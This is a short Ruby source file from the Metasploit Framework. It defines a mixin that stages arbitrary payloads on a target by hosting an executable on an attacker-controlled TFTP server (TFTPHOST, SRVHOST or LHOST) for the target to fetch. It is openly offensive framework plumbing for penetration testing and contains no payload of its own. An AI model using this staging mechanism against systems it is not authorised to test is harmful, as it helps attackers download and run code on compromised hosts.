##
# $Id: cmdstager_tftp.rb 9375 2010-05-26 22:39:56Z jduck $
##

require 'rex/text'
require 'msf/core/exploit/tftp'
require 'msf/core/exploit/cmdstager'

module Msf

###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStagerTFTP

	include Msf::Exploit::CmdStager
	include Msf::Exploit::TFTPServer

	def initialize(info = {})
		super

		register_advanced_options(
			[
				OptString.new( 'TFTPHOST',  [ false, 'The address of the machine hosting the file via TFTP.' ]),
				OptString.new( 'TFTPRSRC',  [ false, 'The filename of the TFTP-hosted resource.' ]),
			], self.class)
	end

	def create_stager(exe)
		Rex::Exploitation::CmdStagerTFTP.new(exe)
	end

	def execute_cmdstager(opts = {})
		tftphost = datastore['TFTPHOST']
		tftphost ||= datastore['SRVHOST']
		tftphost ||= datastore['LHOST']

		@exe_tag = datastore['TFTPRSRC']
		@exe_tag ||= Rex::Text.rand_text_alphanumeric(8)

		opts.merge!({ :tftphost => tftphost, :transid => @exe_tag })

		super
	end

	#
	# Start the service and register the file
	#
	def execute_cmdstager_begin(opts)
		start_service(@exe_tag, @exe)
	end

	#
	# Stop the service
	#
	def execute_cmdstager_end(opts)
		stop_service
	end

end

end
